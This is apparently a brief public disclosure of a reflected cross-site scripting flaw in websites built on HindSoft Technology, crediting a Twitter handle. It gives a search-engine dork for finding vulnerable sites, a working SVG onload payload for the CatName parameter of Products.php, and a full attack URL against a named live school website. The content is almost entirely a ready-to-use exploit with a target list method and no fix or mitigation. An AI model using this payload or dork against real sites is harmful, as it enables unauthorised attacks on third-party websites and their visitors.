HindSoft Technology Cross Site Scripting (XSS) ---------------------------------------------- Twitter: @SonnySpooks ---------------------------------------------- HindSoft - Simplifying e-solutions So Sites Running HindSoft have a paramater on the Products.php file. Products.php?CatName= Dork: intext:"Powered by : HindSoft Technology" ---------------------------------------------- Example: /Products.php?id=1&CatName=School Campus"><svg/onload=alert(/XSS/)> http://www.gdgoenkapatna.com/Products.php?id=1&CatName=School%20Campus%22%3E%3Csvg/onload=alert(/XSS/)%3E